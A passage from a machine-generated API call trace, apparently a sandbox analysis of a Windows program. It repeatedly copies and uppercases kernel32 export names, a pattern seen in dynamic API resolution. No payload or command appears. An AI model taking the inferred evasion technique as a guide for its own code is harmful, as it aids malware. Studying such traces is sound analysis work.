lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0077.037] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0077.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0077.037] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0077.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0077.037] lstrlenA (lpString="CANCELIO") returned 8 [0077.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0077.037] lstrlenA (lpString="CANCELIOEX") returned 10 [0077.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0077.037] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0077.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0077.037] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0077.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0077.037] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0077.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0077.037] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0077.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0077.037] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0077.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0077.037] lstrlenA (lpString="CHECKELEVATION") returned 14 [0077.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0077.037] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0077.037] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0077.037] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0077.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0077.038] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0077.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0077.038] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0077.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0077.038] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0077.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0077.038] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0077.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0077.038] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0077.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0077.038] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0077.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0077.038] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0077.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0077.038] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0077.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0077.038] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0077.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0077.038] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0077.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0077.038] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0077.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0077.038] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUPMEMBERS") returned 34 [0077.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolIo" | out: lpString1="CloseThreadpoolIo") returned="CloseThreadpoolIo" [0077.038] lstrlenA (lpString="CLOSETHREADPOOLIO") returned 17 [0077.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolTimer" | out: lpString1="CloseThreadpoolTimer") returned="CloseThreadpoolTimer" [0077.038] lstrlenA (lpString="CLOSETHREADPOOLTIMER") returned 20 [0077.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWait" | out: lpString1="CloseThreadpoolWait") returned="CloseThreadpoolWait" [0077.038] lstrlenA (lpString="CLOSETHREADPOOLWAIT") returned 19 [0077.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CloseThreadpoolWork" | out: lpString1="CloseThreadpoolWork") returned="CloseThreadpoolWork" [0077.038] lstrlenA (lpString="CLOSETHREADPOOLWORK") returned 19 [0077.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CmdBatNotification" | out: lpString1="CmdBatNotification") returned="CmdBatNotification" [0077.038] lstrlenA (lpString="CMDBATNOTIFICATION") returned 18 [0077.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogA" | out: lpString1="CommConfigDialogA") returned="CommConfigDialogA" [0077.038] lstrlenA (lpString="COMMCONFIGDIALOGA") returned 17 [0077.038] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CommConfigDialogW" | out: lpString1="CommConfigDialogW") returned="CommConfigDialogW" [0077.039] lstrlenA (lpString="COMMCONFIGDIALOGW") returned 17 [0077.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareCalendarDates" | out: lpString1="CompareCalendarDates") returned="CompareCalendarDates" [0077.039] lstrlenA (lpString="COMPARECALENDARDATES") returned 20 [0077.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareFileTime" | out: lpString1="CompareFileTime") returned="CompareFileTime" [0077.039] lstrlenA (lpString="COMPAREFILETIME") returned 15 [0077.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringA" | out: lpString1="CompareStringA") returned="CompareStringA" [0077.039] lstrlenA (lpString="COMPARESTRINGA") returned 14 [0077.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringEx" | out: lpString1="CompareStringEx") returned="CompareStringEx" [0077.039] lstrlenA (lpString="COMPARESTRINGEX") returned 15 [0077.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringOrdinal" | out: lpString1="CompareStringOrdinal") returned="CompareStringOrdinal" [0077.039] lstrlenA (lpString="COMPARESTRINGORDINAL") returned 20 [0077.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CompareStringW" | out: lpString1="CompareStringW") returned="CompareStringW" [0077.039] lstrlenA (lpString="COMPARESTRINGW") returned 14 [0077.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConnectNamedPipe" | out: lpString1="ConnectNamedPipe") returned="ConnectNamedPipe" [0077.039] lstrlenA (lpString="CONNECTNAMEDPIPE") returned 16 [0077.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConsoleMenuControl" | out: lpString1="ConsoleMenuControl") returned="ConsoleMenuControl" [0077.039] lstrlenA (lpString="CONSOLEMENUCONTROL") returned 18 [0077.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ContinueDebugEvent" | out: lpString1="ContinueDebugEvent") returned="ContinueDebugEvent" [0077.039] lstrlenA (lpString="CONTINUEDEBUGEVENT") returned 18 [0077.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertCalDateTimeToSystemTime" | out: lpString1="ConvertCalDateTimeToSystemTime") returned="ConvertCalDateTimeToSystemTime" [0077.039] lstrlenA (lpString="CONVERTCALDATETIMETOSYSTEMTIME") returned 30 [0077.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertDefaultLocale" | out: lpString1="ConvertDefaultLocale") returned="ConvertDefaultLocale" [0077.039] lstrlenA (lpString="CONVERTDEFAULTLOCALE") returned 20 [0077.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertFiberToThread" | out: lpString1="ConvertFiberToThread") returned="ConvertFiberToThread" [0077.039] lstrlenA (lpString="CONVERTFIBERTOTHREAD") returned 20 [0077.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertNLSDayOfWeekToWin32DayOfWeek" | out: lpString1="ConvertNLSDayOfWeekToWin32DayOfWeek") returned="ConvertNLSDayOfWeekToWin32DayOfWeek" [0077.039] lstrlenA (lpString="CONVERTNLSDAYOFWEEKTOWIN32DAYOFWEEK") returned 35 [0077.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertSystemTimeToCalDateTime" | out: lpString1="ConvertSystemTimeToCalDateTime") returned="ConvertSystemTimeToCalDateTime" [0077.039] lstrlenA (lpString="CONVERTSYSTEMTIMETOCALDATETIME") returned 30 [0077.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiber" | out: lpString1="ConvertThreadToFiber") returned="ConvertThreadToFiber" [0077.039] lstrlenA (lpString="CONVERTTHREADTOFIBER") returned 20 [0077.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ConvertThreadToFiberEx" | out: lpString1="ConvertThreadToFiberEx") returned="ConvertThreadToFiberEx" [0077.039] lstrlenA (lpString="CONVERTTHREADTOFIBEREX") returned 22 [0077.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyContext" | out: lpString1="CopyContext") returned="CopyContext" [0077.039] lstrlenA (lpString="COPYCONTEXT") returned 11 [0077.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileA" | out: lpString1="CopyFileA") returned="CopyFileA" [0077.039] lstrlenA (lpString="COPYFILEA") returned 9 [0077.039] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExA" | out: lpString1="CopyFileExA") returned="CopyFileExA" [0077.040] lstrlenA (lpString="COPYFILEEXA") returned 11 [0077.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileExW" | out: lpString1="CopyFileExW") returned="CopyFileExW" [0077.040] lstrlenA (lpString="COPYFILEEXW") returned 11 [0077.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedA" | out: lpString1="CopyFileTransactedA") returned="CopyFileTransactedA" [0077.040] lstrlenA (lpString="COPYFILETRANSACTEDA") returned 19 [0077.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileTransactedW" | out: lpString1="CopyFileTransactedW") returned="CopyFileTransactedW" [0077.040] lstrlenA (lpString="COPYFILETRANSACTEDW") returned 19 [0077.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyFileW" | out: lpString1="CopyFileW") returned="CopyFileW" [0077.040] lstrlenA (lpString="COPYFILEW") returned 9 [0077.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CopyLZFile" | out: lpString1="CopyLZFile") returned="CopyLZFile" [0077.040] lstrlenA (lpString="COPYLZFILE") returned 10 [0077.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxA" | out: lpString1="CreateActCtxA") returned="CreateActCtxA" [0077.040] lstrlenA (lpString="CREATEACTCTXA") returned 13 [0077.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateActCtxW" | out: lpString1="CreateActCtxW") returned="CreateActCtxW" [0077.040] lstrlenA (lpString="CREATEACTCTXW") returned 13 [0077.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorA" | out: lpString1="CreateBoundaryDescriptorA") returned="CreateBoundaryDescriptorA" [0077.040] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORA") returned 25 [0077.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateBoundaryDescriptorW" | out: lpString1="CreateBoundaryDescriptorW") returned="CreateBoundaryDescriptorW" [0077.040] lstrlenA (lpString="CREATEBOUNDARYDESCRIPTORW") returned 25 [0077.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateConsoleScreenBuffer" | out: lpString1="CreateConsoleScreenBuffer") returned="CreateConsoleScreenBuffer" [0077.040] lstrlenA (lpString="CREATECONSOLESCREENBUFFER") returned 25 [0077.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryA" | out: lpString1="CreateDirectoryA") returned="CreateDirectoryA" [0077.040] lstrlenA (lpString="CREATEDIRECTORYA") returned 16 [0077.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExA" | out: lpString1="CreateDirectoryExA") returned="CreateDirectoryExA" [0077.040] lstrlenA (lpString="CREATEDIRECTORYEXA") returned 18 [0077.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryExW" | out: lpString1="CreateDirectoryExW") returned="CreateDirectoryExW" [0077.040] lstrlenA (lpString="CREATEDIRECTORYEXW") returned 18 [0077.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedA" | out: lpString1="CreateDirectoryTransactedA") returned="CreateDirectoryTransactedA" [0077.040] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDA") returned 26 [0077.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryTransactedW" | out: lpString1="CreateDirectoryTransactedW") returned="CreateDirectoryTransactedW" [0077.040] lstrlenA (lpString="CREATEDIRECTORYTRANSACTEDW") returned 26 [0077.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateDirectoryW" | out: lpString1="CreateDirectoryW") returned="CreateDirectoryW" [0077.040] lstrlenA (lpString="CREATEDIRECTORYW") returned 16 [0077.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventA" | out: lpString1="CreateEventA") returned="CreateEventA" [0077.040] lstrlenA (lpString="CREATEEVENTA") returned 12 [0077.040] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExA" | out: lpString1="CreateEventExA") returned="CreateEventExA" [0077.040] lstrlenA (lpString="CREATEEVENTEXA") returned 14 [0077.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventExW" | out: lpString1="CreateEventExW") returned="CreateEventExW" [0077.041] lstrlenA (lpString="CREATEEVENTEXW") returned 14 [0077.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateEventW" | out: lpString1="CreateEventW") returned="CreateEventW" [0077.041] lstrlenA (lpString="CREATEEVENTW") returned 12 [0077.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiber" | out: lpString1="CreateFiber") returned="CreateFiber" [0077.041] lstrlenA (lpString="CREATEFIBER") returned 11 [0077.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFiberEx" | out: lpString1="CreateFiberEx") returned="CreateFiberEx" [0077.041] lstrlenA (lpString="CREATEFIBEREX") returned 13 [0077.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileA" | out: lpString1="CreateFileA") returned="CreateFileA" [0077.041] lstrlenA (lpString="CREATEFILEA") returned 11 [0077.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingA" | out: lpString1="CreateFileMappingA") returned="CreateFileMappingA" [0077.041] lstrlenA (lpString="CREATEFILEMAPPINGA") returned 18 [0077.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaA" | out: lpString1="CreateFileMappingNumaA") returned="CreateFileMappingNumaA" [0077.041] lstrlenA (lpString="CREATEFILEMAPPINGNUMAA") returned 22 [0077.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingNumaW" | out: lpString1="CreateFileMappingNumaW") returned="CreateFileMappingNumaW" [0077.041] lstrlenA (lpString="CREATEFILEMAPPINGNUMAW") returned 22 [0077.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileMappingW" | out: lpString1="CreateFileMappingW") returned="CreateFileMappingW" [0077.041] lstrlenA (lpString="CREATEFILEMAPPINGW") returned 18 [0077.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedA" | out: lpString1="CreateFileTransactedA") returned="CreateFileTransactedA" [0077.041] lstrlenA (lpString="CREATEFILETRANSACTEDA") returned 21 [0077.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileTransactedW" | out: lpString1="CreateFileTransactedW") returned="CreateFileTransactedW" [0077.041] lstrlenA (lpString="CREATEFILETRANSACTEDW") returned 21 [0077.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateFileW" | out: lpString1="CreateFileW") returned="CreateFileW" [0077.041] lstrlenA (lpString="CREATEFILEW") returned 11 [0077.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0077.041] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0077.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0077.041] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0077.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0077.041] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0077.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0077.041] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0077.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0077.041] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0077.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0077.041] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0077.041] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0077.042] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0077.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0077.042] lstrlenA (lpString="CREATEJOBSET") returned 12 [0077.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0077.042] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0077.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0077.042] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0077.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0077.042] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0077.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0077.042] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0077.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0077.042] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0077.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0077.042] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0077.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0077.042] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0077.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0077.042] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0077.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0077.042] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0077.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0077.042] lstrlenA (lpString="CREATEPIPE") returned 10 [0077.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0077.042] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0077.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0077.042] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0077.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0077.042] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0077.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0077.042] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0077.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0077.042] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0077.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0077.042] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0077.042] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0077.042] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0077.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0077.043] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0077.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0077.043] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0077.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0077.043] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0077.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0077.043] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0077.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0077.043] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0077.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0077.043] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0077.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0077.043] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0077.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0077.043] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0077.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0077.043] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0077.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0077.043] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0077.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0077.043] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0077.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0077.043] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0077.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0077.043] lstrlenA (lpString="CREATETHREAD") returned 12 [0077.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0077.043] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0077.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0077.043] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0077.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0077.043] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0077.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0077.043] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0077.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0077.043] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0077.043] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0077.043] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0077.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0077.044] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0077.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0077.044] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0077.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0077.044] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0077.044] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") 